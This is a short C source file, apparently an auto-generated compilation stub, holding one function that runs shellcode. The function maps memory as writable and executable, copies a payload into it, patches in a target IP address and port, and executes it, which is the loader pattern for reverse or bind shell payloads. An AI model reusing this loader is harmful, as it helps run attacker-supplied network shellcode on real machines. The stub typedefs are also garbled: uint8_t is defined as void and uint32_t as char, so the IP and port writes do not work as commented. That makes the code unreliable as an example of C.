#define NULL ((void*)0)
typedef unsigned long size_t;  // Customize by platform.
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;  // Either arithmetic or pointer type.
/* By default, we understand bool (as a convenience). */
typedef int bool;
#define false 0
#define true 1

/* Forward declarations */

/* Type definitions */
typedef  void uint8_t ;
typedef  char uint32_t ;
typedef  char int16_t ;

/* Variables and functions */
 int MAP_ANON ; 
 int MAP_PRIVATE ; 
 int PROT_EXEC ; 
 int PROT_READ ; 
 int PROT_WRITE ; 
 int /*<<< orphan*/  memcpy (void*,char*,int) ; 
 scalar_t__ mmap (int /*<<< orphan*/ ,int,int,int,int,int /*<<< orphan*/ ) ; 
 int /*<<< orphan*/  munmap (void*,int) ; 
 void stub1 () ; 

void xcode(char *s, int len, uint32_t ip, int16_t port)
{
  uint8_t *p;
  
  p=(uint8_t*)mmap (0, len, 
      PROT_EXEC | PROT_WRITE | PROT_READ, 
      MAP_ANON  | MAP_PRIVATE, -1, 0);  

  memcpy(p, s, len);
  memcpy((void*)&p[3], &port, 2); // set the port  
  memcpy((void*)&p[6], &ip,   4); // set the ip
  
  //bin2file(p, len);
  
  // execute
  ((void(*)())p)();
    
  munmap ((void*)p, len);  
}